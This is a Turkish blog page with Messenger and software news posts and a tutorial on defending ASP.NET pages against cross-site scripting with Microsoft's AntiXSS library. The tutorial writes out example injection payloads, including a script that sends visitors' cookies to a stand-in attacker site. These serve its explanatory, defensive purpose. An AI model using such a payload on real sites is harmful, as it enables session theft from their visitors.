Baglantilar

Yazar: | Kategori: Messenger
Yorum: 3

Windows Live MEssenger Beta Test Yayını Başladı..

Hello from the Windows Live Messenger Team!

We’ve been hard at work building the foundation for Windows Live Messenger 9.0, we’d like to give you a look at what we’ve built and ask what you think. We’re running a small private beta to get early feedback on the new features we’ve built and get wider test coverage of the build.

As a beta tester you’ll have access to an early 9.0 build, a private newsgroup just for Windows Live Messenger beta testers, and the ability to send bugs directly to the product team. The build you’ll be beta testing with is a very early build, so it may be less stable than beta builds you’ve tried in the past. We’re telling you this upfront so you know what you’re getting into. If you’re not sure about trying a not-quite polished build, maybe this beta isn’t for you. If you’re ready to dig in and explore this build with us, follow the below instructions to nominate yourself.


Click “Invitation” in the left nav pane
Enter this invitation ID: xxx
Click Go
Fill out the nomination survey
We’ll review all survey responses and accept as many people into the beta as we can. Look for mail from us soon!

We look forward to hearing from you!
The Windows Live Messenger Team

________________

Just two weeks after the release of Windows Live Messenger 2008 (aka version 8.5), Microsoft begins the Beta for version 9.0 of their instant messaging client for the Windows Operating System. The Beta kicked off about 10 hours ago with e-mails being sent to some of those who were involved in testing previous Messenger builds. For those of you who want to test this version, unfortunately it’s a private, invitation-only, Beta this time round. Current Beta testers are not able to send invitations to friends and family as Microsoft has decided to go back to the Beta testing method used back in the Msn Messenger days, where only they can invite people to participate in Beta’s (at least for this round of the Beta).
If you were lucky enough to receive an invitation e-mail from Microsoft, head over to Microsoft Connect as soon a possible to sign-up using the details given in the e-mail as spaces for participation in this Beta are very limited.
That’s all the news we have for you about the latest Messenger Beta, we’ll post more as soon as we get it.

17 Kasım 2007
Yazar: | Kategori: Messenger
Yorum: 0

Liveside’da belirtilene göre Microsoft, Windows Live Wave 2 olarak adlandırdığı yeni paketini Çarşamba günü sunmaya hazırlanıyor. Bu paket bazı yazılımların, Messenger 8.5 gibi, Beta olmayan resmi sürümlerini içeriyor. Paketin içeriği şöyle;

Yazılım olarak: WL Messenger 8.5, Windows Live Mail, Windows Live Writer, Photo Gallery ve Onecare dahilinde Family Safety
İnternet Servisi olarak: WL Hotmail, WL Events*, Skydrive and Live Search 2.0

Ayrıca Microsoft, yeni Wave 2 paketi için bir de sayaç sitesi hazırlamış.

Güncelleme: Yazılım paketini, Çarşamba’yı beklemeden buradan (Türkçe) indirebilirsiniz.

10 Kasım 2007
Yazar: | Kategori: Messenger
Yorum: 0

Messenger için plus live eklentisi =)..

8.x sürümleri ile uyumludur.

Mssenger Plus! Live, Msn Messenger ve Windows Messenger için en iyi eklentidir.
Gerek sunduğu ekstra özellikler ile gerek güvenlik hizmetleriyle vazgeçilmez hale geliyor. Örneğin; tüm günlüklerinizi şifreliyor ve şifreyi bilmeyenler sizin günlüklerinizi okuyamıyor. Renkli rumuz (nick) yapabilme olanağı, tek tuşla Messenger’ı kapatabilme, arkaplan rengini değiştirebilme gibi özellikleriyle farkını ortaya koyuyor. Program kurulumunda size reklam desteğinin yüklenip yüklenmeyeceği soruluyor. Bu soruya hayır cevabını verirseniz sisteminize herhangi bir tehlikeli yazılım eklenmiyor. Program son virüs veritabanına sahip 3 Antivirüs yazılımı ile kontrol edilmiş ve herhangi bir virüs ya da zararlıya rastlanmamıştır.

Çeşitli Messenger Olanakları
Plus! ile kişi listenizi düzenlemek için kişi adlarını yeniden adlandırabilir, kişi listeni temizlemek için kişilerin istatistiklerini görebilir, pencerelerini şeffaflaştırabilir, dosya aktarımlarını otomatik kabul edebilir, gelen ve giden mesajları filtreleyebilir ve daha bir çok şey yapabilirsiniz.
Mesajlaşma Deneyiminizi Zenginleştirin!
Siz uzakta ya da boştayken, sizinle kontakt kuran kişilerinize göndermek için kendi kişisel durum mesajınıza sahip olabilirsiniz. Messenger Plus! ayrıca, anında hızlı metinleriniz için 50 adet yer, tek bir basit kısayol ya da belirlenmiş bir komutla gönderebileceğiniz kişiselleştirilebilir otomatik mesajlar, kodlarını hatırlamaya gerek kalmadan kolayca kullanabileceğiniz hızlı simge panelleri, metin yineleme özelliği ile yakınlarda gönderdiğiniz mesajı tekrar yollama, konuşmalar içinde arama ve alıntı ileti yollama olanakları tanır.

Gelişmiş Günlük Arşivleme
Daha önceden Msn Messenger, günlük kaydının bir imzasını gösteriyordu. Messenger Plus! buna zaten olanak tanıyor. Plus!’ın günlük kaydı arşivlemesiyle, şifrelemesiyle ve olanları unutmamak için tüm olayları kaydetmesiyle Messenger’inkinden çok daha farklı.

Diğer Mesajlaşma Özellikleri
Messenger Plus! size, ön ve arkaplan için istediğiniz herhangi bir renk seçmenize ve kalın, italik, altı çizili ve canlandırılmış yazı biçimleri eklemenize olank tanır. Bu sizin, IRC’deki gibi Messenger’ın komut adı verilen metin kısayollarını her yönüyle kontrol etmenizi sağlar.

Bildirimleri Zenginleştir
Eğer Hotmail kullanmıyorsanız, kendi pop3 posta hesaplarınızdan birini bildirim için seçebilirsiniz (beş adet e-posta eklenebilir!). Ek olarak, kişilerin çevrimiçi, çevrimdışı olduğunda ya da rumuzlarını değiştirdiklerinde bildirimler alabilirsiniz.

Güvenlik & Mağduriyet Kontrolü
Messenger Plus! bir “Patrondan Korunma” özelliği sunar. Bu özellik tek bir kısayolla Messenger’ı ve konuşma pencerelerinizi gizler ve kimlerle konuşuyorduysanız onları olay hakkında bilgilendirir. Bu ayrıca bilgisayarınızın başından ayrıldığınızda Messenger’ı şifreyle kilitlemeye de yarar. Ayrıca özel konuşmalarınızı korumak için önceki konuşmalarıda sadece sizin okuyabilmeniz için şifreler.

Güzel, basit ve kullanışlı bir arayüz
Yüzlerce özelliğine rağmen, Plus! organize edilen herşeyi, basit kullanıcı tecrübeleri ve kullanırken daha fazla hoşnut olmanız için Plus! 3’te yeniden tasarlanan tek bir ayarlar diyaloğunda saklar. Messenger Plus! ayrıca konuşma pencerelerine gönderilen komutlar vasıtasıya bir çok özelliğe, global kısayollar ve ortam menülerine erişim olanağı tanır.

# Eklenti Mimarlığı
Messenger Plus! özelliklerini yeterli bulmuyorsanız, eklentileri yükleyerek yeni yetenekler katabilirsiniz. Daha fazla bilgi ve yüklemek için eklentiler bölümünü ziyaret edin.

Ve son olarak tamamı BEDAVA!
Messenger Plus! ücretsiz bir yazılımdır. Arkadaşlarınıza göndererek kullanmaları için teşvik edebilirsiniz! Kesinlikle casus yazılım ya da truva atı (trojan) içermez. Kurulum sırasında isteğe bağlı sponsor program yüklenebilir, herhangi bir riski yoktur! Sponsor programı yüklemeyip yine de desteklemek isterseniz, Messenger Plus! çevrimiçi mağazasını ziyaret edin ya da sadece bir dakikanızı posta kartı yollamak için ayırın.

Messenger Plus! Live 4.23.276 (05/06/2007)

* Fixed: the icon to access the 6th anniversary contest disappears after June 5th.
* Fixed: the “Format Codes” button is not added in the Messenger options in Chinese versions of Messenger.
* Fixed: in some rare instances, Messenger 8.5 may crash after closing a chat window (remember that support for this version of Messenger is still beta though)..
* Fixed a couple of other small problems.

Size: 3.21 Mb

Download

Yazar: | Kategori: Messenger
Yorum: 1

Windows Live Messenger 8.5 Final – 8.5.1302.1018

 

Windows Live Messenger 8.5.1302.1018 Yayınlanmıştır.

Download:
http://g.live.com/1rewlive/tr/WLInstaller.exe

Uyumlu Discovery :

http://www.hell-world.org/user/discovery/messengerdiscovery-live.php.htm

Yazar: | Kategori: Yazilim
Yorum: 2

CamStudio 2.1.051
camtasia
CamStudio ile bilgisayarınız üzerinde yaptıklarınızı video olarak kaydedebilirsiniz.
Bilgisayarınız üzerinde hangi işlemi yaparsanız yapın bunları video olarak kaydedebiliyorsunuz.Video kayıt formatlarını,SWf ya da AVI olarak kaydetme imkanına sahip.Görüntü kalitesinin mükemmele yakın,ayar seçeneklerinin çeşitliliği,kullanım kolaylığı, ve kayıt edilen formatlar arasında dönüşüm imkanını sağlaması camstudio’yu benzerlerinden farklı kılıyor.

http://w14.easy-share.com/9010881.html 

Yazar: | Kategori: Genel
Yorum: 0

hell-world.org

fact bites sitesi bir arama motoru olmasından ziyade Google, yahoo ve Msn den farkı; anlamsız, işe yaramayan arama sonuçlarını ayıklayıp bunları anlamlı, kullanıcının işine yarayacak bir şekilde süzüp, sonuçları öyle göstereceğini vaad ediyor. hakia benzeri de denebilir.


Yazar: | Kategori: Genel
Yorum: 0

 hell-world.org

500 mb olarak yola başlayan skydrive artık 1 gb depolama alanı sunabilmekte.

Hala beta aşamasında olan bu Live hizmeti henüz herkese açık bir beta değil. (bölgeniz amerika değilse kaydolamıyorsunuz.)

Skydrive‘ın betadan çıkıp belkide xdrive‘ı yakalamasını sabırsızlıkla bekliyoruz

Yazar: | Kategori: Haberler
Yorum: 1

Merhabalar..

HacKHeLL.Com Olarak daha önce forumumuzda xss yi program haline getirerek şu anda üyelerin göremediği yer ‘de arşive kaldırmış bulunuyoruz.

Makaleyi okumadan Buraya Tıklatarak Ulaşacağınız Bölümden Xss’nin Ne olduğuna dair bilgiler alabilirsiniz..

Uzun zaman geçti Xss neden hala anlatılmıyor ya/da çalışmıyormu? Gibi sorunlarınıza cavap niteliyi taşıyan sayfaya Buraya Tıklatarak ulaşabilirsiniz..

Bu kadar bilgiden sonra Xss nin hala var olduğunu düşünerek korunma yollarımıza göz atalım.

Cross Site Scripting bilindiği gibi saadece maillerde değil web sitelerini hackleme yöntemleri arasında ‘da bulunmakta.. Ayrıntılı bilgi için Buraya Bakabilirsiniz..

Makalemizde Cross Site Scripting açığından korunmak için gerekli yolları Microsoft tarafından piyasaya sürülen program ile anlatacağım..

Öncelikle Microsoft ‘un resmi sitesindeki Microsoft.Application.Security.AntiXSS‘yazılımı bilgisayarımıza inndiriyoruz..

Kurulum evreleri Gif örneyi :

Programı install ettikten sonra artık neye yaradığından bahsedelim =)

Microsoft.Application.Security.AntiXSS namespace’inden ulaşabileceğimiz 7 vazgeçilmez metot ile hedeften sitemizi kaçırıcaz bu metotlar ;

• HtmlEncode
• HtmlAttributeEncode
• JavaScriptEncode
• UrlEncode
• VisualBasicScriptEncode
• XmlEncode
• XmlAttributeEncode


Örnek :
l

HTML Code:

tAd.Text = “‘); location.href=’[url]http://www.hackhell.com’;[/url] alert(’a”);

— Bunun yerine ;

Olması Gereken : l

Code:

tAd.Text = JavaScriptEncode(”‘); location.href=’http://hackhell.com’; alert(’a”);

Neden böyle olması gerekiyor diye kendi kendinize sorabilirsiniz ANTİXSS kütüphanesi belli başlı karakterleri ” Encode ” eder bunlar ascii değeri 160-255 olan karakterlerdir.

_______________
ProfessionaL’lar için
Biraz daha ayrıntıya inerisek;

Kullanıcıdan alınan bilgi olduğu gibi veritabanına kaydediliyorsa ve aynı şekilde veritabanındanda istemciye gönderiliyorsa kötü niyetli kodların istemci tarafından çalıştırılması muhtemeldir.

Örneğin bir ziyaretçi defteri doldururken mesaj kısmına

Code:

<script> location.href= ‘http://www.google.com’;</script>

Gibi bir bilgi girilirse ve herhangi bir kontrol olmadan bu siteyi ziyaret eden kullanıcılara bu bilgi gönderilirse, ziyaretçiler karşılarında sizin sitenizi değil, Google’ı göreceklerdir.

Ziyaretçilerin tarayıcılarında çalıştırılan bir javascript kodu ziyaretçiniz hakkındaki Session bilgilerinin de çalınmasına sebep olabilir.

Code:

<script> document.location='http://www.kotuniyetlisite.com/yaz.aspx?a='+document.cookie </script>

Şeklinde girilen bir script sitenizi ziyaret eden her kullanıcının Session bilgilerini saldırganın sitesine gönderir. Bundan sonrası saldırganın tercihne kalmış. Session bilgilerini kendine mail atabilir yada kendi veritabanına kaydebilir.

Asp.NET programcıları bu konuda diğer web geliştiricilerinden biraz daha şanslı. Çünkü, “<” ve “>” karakterleri içinde gelen bilgi “Potansiyel Tehlikeli Bilgi” olarak algılanır ve sistem hata verir.

Ancak günümüz de sık geliştirilen “İçerik Yönetim Sistem” leri “FCK Editor” gibi html kodu üreten WYSWYG* editörleri kullanmakta.

Bu da Asp.NET programcısının “Fck Editor” kullandığı sayfasının başına ValidateRequest=”false” gibi bir kodu eklemesine sebep veriyor. Bu da XSS saldırıları için bir davet anlamına gelir.

Buraya kadar verdiğimiz örnekler HTML kodları arasına sızan tekniklerdi.

Kullanıcıdan alınan bilgi ile oluşturulabilecek JavaScript, VBScript, XML de bu tehlikelere maruz kalabilir.

Javascript için basit bir örnek verelim.
Default.aspx dosyamızda bulunan Javascript :

Code:

<script type="text/javascript" > alert('Merhaba’ + ‘<asp:Literal runat="server" id="ltAd" />'); </script>

Default.aspx.cs dosyasından gönderilen bilgi :

Code:

ltAd.Text = "heLL";

Sayfa çalıştırıldığında “Merhaba heLL” şeklinde bir MessageBox çıkıyor.

“heLL” değerinin veritabanından geldiğini farzedelim. Eğer veritabanından gelen şöyle bir şey olursa :

Code:

ltAd.Text = " ' location.href='http://www.google.com'; alert('a";

Sayfamız derlendiğinde ortaya çıkan Javascript kodunu inceleyelim :

Code:

<script type="text/javascript" > alert('Merhaba '); location.href='http://www.google.com'; alert('a'); </script>

Ziyaretçi “Merhaba” şeklinde bir MessageBox görür ve kendini yine Google da bulur.

Bu konuda örnekler çoğaltılabilir.

Yukarıda verdiğim örnek ile ;

Code:

ltAd.Text = "'); location.href='http://www.google.com'; alert('a");

yerine;

Code:

using Microsoft.Security.Application.AntiXss; ... ltAd.Text = JavaScriptEncode("'); location.href='http://www.google.com'; alert('a");

Şeklinde kullandığımızda bir ziyaretçilerimiz bir zarar görmeyecektir.

Sayfamızı derledikten sonra oluşan Javascript kodumuzu inceleyelim :

Code:

<script type="text/javascript" > alert('Merhaba '\x27\x29\x3b location.href\x3d\x27http\x3a\x2f\x2fwww.google.com\x27\x3b alert\x28\x27a'); </script>

Görüldüğü gibi “)“ işareti \x27 ye , “;” işareti \x29 a ve diğer zararlı karakterlerde Javascript’in karşılıklarına çevrilmiş. Bu kodlar çalıştırılamaz ama aynı karaktersel değerleini korurlar.

Örneğin

Code:

ltAd.Text = Microsoft.Security.Application.AntiXss.JavaScriptEncode("heLL");


Şeklinde bir kullanımda ekranda “heLL” yazar ancak kaynak kodunda “ç” karakteri \u00e7 olarak kodlanmıştır.

“ç” harfi ascii tablosunda bulunmuyor ancak unicode değer olan 351’in Hexadecimal eşiti 00e7 dir. Dolayısıyla Javascript’tin ç harfini \u00e7 olarak tanır. .

Saygılar…

Not: Konunun Bir Kopyası Security Bölümün’de Diğeri ise mail hacking seucirty bölümünde sabitte-kilitli olarak bulunmaktadır.

Yukarı
Yazilar iin RSS aboneligi